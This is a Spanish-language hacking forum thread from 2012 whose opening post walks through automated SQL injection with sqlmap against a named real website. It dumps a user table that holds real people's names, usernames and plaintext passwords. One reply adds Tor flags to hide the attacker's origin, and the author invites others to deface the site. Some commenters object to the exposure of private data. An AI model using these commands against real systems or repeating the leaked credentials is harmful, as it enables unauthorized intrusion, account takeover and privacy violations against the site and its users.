Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: ANTRAX en Octubre 08, 2012, 01:37:38 AM

Título: SQLi Automatizado con SQLMAP
Publicado por: ANTRAX en Octubre 08, 2012, 01:37:38 AM
(http://1.bp.blogspot.com/-5mQCRtsNjOU/UHJPLAAAnEI/AAAAAAAABYQ/By1gRwebKkM/s256/1.png)

Introducción:

En este paper veremos como obtener los datos de admin de una base de datos utilizando SQLMAP.
Para este tutorial usare Backtrack, ya que viene instalado y está listo para usarse.
Para abrirlo vamos a:

Applications  >>  Backtrack  >>  Exploitation Tools  >>  Web Exploitation Tools  >>  sqlmap

A penas abrimos sqlmap, podremos ver todos los parámetros disponibles, ahora solo usaremos los elementales.

(http://2.bp.blogspot.com/-WmTOY-UnvdQ/UHJPNKAdEyI/AAAAAAAABYo/FygdClX4OkM/s1600/2.png)

Voy a usar una web vulnerable smartenergyhome.eu
Las querys las haremos desde aquí: smartenergyhome.eu/eng/seh-buildings.php?id=9

Extracción de información

Comenzaremos sacando los nombres de las bases de datos, para ello tipeamos:

python sqlmap.py -u target.com/index.php?id=9 --dbs

(http://2.bp.blogspot.com/-M9gsiPG0Tf8/UHJPMX7yTaI/AAAAAAAABYY/l8Uo1aNLVzY/s1600/3.png)

El programa comenzara a buscar las bases de datos y las mostrara una vez que finalice de correr

(http://1.bp.blogspot.com/-20IbkzAk_Lo/UHJPOtJ6FDI/AAAAAAAABZA/0_MM5XfjFwA/s1600/4.png)

En mi caso me trajo 2, de las cuales una es por el cpanel y la otra es de la web.
La que usaremos será la segunda "smartene_SEH"
Ahora que tenemos el nombre de la base de datos, sigue buscar las tablas que posee, para ello vamos a tipear:

python sqlmap.py -u target.com/index.php?id=9 –D smartene_SEH -- tables

(http://4.bp.blogspot.com/-ZWLhbnbFn9c/UHJPNgtTm3I/AAAAAAAABYw/ZZxlW1pS8OA/s1600/5.png)

Este comando nos arrojara todas las tablas que tiene el sistema, y obviamente debemos buscar alguna que contenga datos de administradores para podernos loguear

(http://1.bp.blogspot.com/-t0LjzwaNsc4/UHJPOMMdmOI/AAAAAAAABY4/07v4bgm1CDI/s260/6.png)

En mi caso, la última tabla tiene el nombre "usuarios" por lo tanto, esa debe ser la tabla que tiene los datos de los admines.
Ahora veremos las columnas que tiene esa tabla de usuarios, para ver si en verdad tiene algún usuario y contraseña para luego entrar al panel de admin...
Ahora que conocemos el nombre de la tabla, vamos a tipear ahora lo siguiente:

python sqlmap.py -u target.com/index.php?id=9 –D smartene_SEH –T usuarios -- columns

(http://1.bp.blogspot.com/-wEikS4S3J60/UHJPOdyrN8I/AAAAAAAABY8/UC4SHVzVr30/s1600/7.png)

Esto nos devolverá los nombres de las columnas que tiene dicha tabla.

(http://4.bp.blogspot.com/-OKxFQw1_UtI/UHJPPO7uhFI/AAAAAAAABZM/Kjs9zYosLoI/s1600/8.png)

Como podemos ver, hemos dado con la tabla que buscábamos. Esta tabla posee usuarios y contraseñas.
Para poder ver que datos contiene esta tabla, vamos a tipear:

python sqlmap.py -u target.com/index.php?id=9 –D smartene_SEH –T usuarios --dump

Una vez ejecutado el comando, nos dará los datos que contiene esa tabla

(http://2.bp.blogspot.com/-sQF3_pBC1Eg/UHJPMZn0b9I/AAAAAAAABYc/hNPOKOnbBbc/s1600/10.png)

Código (text) [Seleccionar]
+----+------------------------+------------------+----------+---------------------+----------+
| id | email                  | nombre           | usuario  | editado             | password |
+----+------------------------+------------------+----------+---------------------+----------+
| 1  | [email protected] | Gustavo Zapico   | gzapico  | 2009-03-02 06:02:34 | medica3  |
| 2  | [email protected]      | Gen\xeds Bayarri | gbayarri | 2009-03-02 06:20:37 | vis-tek  |
| 3  | [email protected]         | Josefin Berg     | jberg    | 2009-03-12 05:05:38 | seh2009  |
| 4  | [email protected]          | Laszlo Bax       | lbax     | 2010-03-26 16:46:18 | seh2009  |
+----+------------------------+------------------+----------+---------------------+----------+


Al ser este un tutorial educativo, no ingresaremos al sistema. Simplemente se expone el manejo de esta poderosa herramienta.
ANTRAX
Título: Re:SQLi Automatizado con SQLMAP
Publicado por: zoro248 en Octubre 08, 2012, 11:56:56 AM
Gracias por aportar, pero me gustaria hacerlo sin usar tool, pero para eso estoy estudiando sql desde 0



<!-- Saludos -->
Título: Re:SQLi Automatizado con SQLMAP
Publicado por: ANTRAX en Octubre 08, 2012, 12:26:08 PM
Aca te dejo la forma manual desde cero: http://underc0de.org/foro/bugs-y-exploits/sql-injection-desde-cero
Y aca tenes Blind SQLi manual tambien desde cero: http://underc0de.org/foro/bugs-y-exploits/blind-sqli-desde-cero-%28sqli-a-ciegas%29-by-antrax/

Saludos!
Título: Re:SQLi Automatizado con SQLMAP
Publicado por: c1st en Octubre 08, 2012, 12:31:15 PM
Nunca esta demás saber como utilizarlo con Tor si creyeran que fuese necesario. y esto se hace de la siguiente manera:

Se debe agregar en la linea de comandos explicada por ANTRAX lo siguiente:

Código (text) [Seleccionar]
--tor --check-tor --tor-port=35978 --tor-type=SOCKS5

De donde obtenemos esta informacion para saber si esta correcta con la configuracion propia de Tor? , gracias a la suite Vidalia
Donde al comenzar a correr tor, vamos al navegador que se abre -< Preferencias  y vemos el protocolo de la proxy y el puerto.

(http://i.imgur.com/EXNDN.png)

Título: Re:SQLi Automatizado con SQLMAP
Publicado por: ANTRAX en Octubre 08, 2012, 12:36:51 PM
Buenisimo aporte!
Muchas gracias por complementar el post bro!
Título: Re:SQLi Automatizado con SQLMAP
Publicado por: [C]orrupted[B]yte en Octubre 08, 2012, 01:48:04 PM
Al ser este un tutorial educativo, no ingresaremos al sistema. Simplemente se expone el manejo de esta poderosa herramienta.


bitch please estas exponiendo informacion privada y la url completa del sitio si vas a estar de blackhat no vengas justificandote despues, acepta responsabilidades y simplemente no te justifiques al final de post.
Título: Re:SQLi Automatizado con SQLMAP
Publicado por: ANTRAX en Octubre 08, 2012, 01:50:10 PM
El tutorial fue hecho con fines educativos, la falla ya fue reportada.
Yo no colgare un index ni nada de eso.
El que desee hacerlo, adelante
Título: Re:SQLi Automatizado con SQLMAP
Publicado por: zoro248 en Octubre 08, 2012, 05:26:29 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Aca te dejo la forma manual desde cero: http://underc0de.org/foro/bugs-y-exploits/sql-injection-desde-cero
Y aca tenes Blind SQLi manual tambien desde cero: http://underc0de.org/foro/bugs-y-exploits/blind-sqli-desde-cero-%28sqli-a-ciegas%29-by-antrax/

Saludos!
Muchas Gracias ya los estoy checando

<!-- Saludos -->
Título: Re:SQLi Automatizado con SQLMAP
Publicado por: Abnormality en Octubre 08, 2012, 08:51:17 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Nunca esta demás saber como utilizarlo con Tor si creyeran que fuese necesario. y esto se hace de la siguiente manera:

Se debe agregar en la linea de comandos explicada por ANTRAX lo siguiente:

Código (text) [Seleccionar]
--tor --check-tor --tor-port=35978 --tor-type=SOCKS5

De donde obtenemos esta informacion para saber si esta correcta con la configuracion propia de Tor? , gracias a la suite Vidalia
Donde al comenzar a correr tor, vamos al navegador que se abre -< Preferencias  y vemos el protocolo de la proxy y el puerto.

(http://i.imgur.com/EXNDN.png)

Tambien estaria bueno que explique como cambiar el user agent.
Título: Re:SQLi Automatizado con SQLMAP
Publicado por: hielasangre en Octubre 24, 2012, 07:32:57 AM
Cita de: [Corruptedyte link=topic=11428.msg40819#msg40819 date=1349714884]
Al ser este un tutorial educativo, no ingresaremos al sistema. Simplemente se expone el manejo de esta poderosa herramienta.


bitch please estas exponiendo informacion privada y la url completa del sitio si vas a estar de blackhat no vengas justificandote despues, acepta responsabilidades y simplemente no te justifiques al final de post.

comparto la opinion, si quisieras hacer algo "etico" podrias con el tuto adjuntar un ejemplo de una aplicacion mal codeada a proposito, con las configuraciones que deben ser onda escenario "real". De onda el comentario :P
Título: Re:SQLi Automatizado con SQLMAP
Publicado por: BCKTR1X en Noviembre 30, 2012, 02:10:46 AM
esta exelente  ;D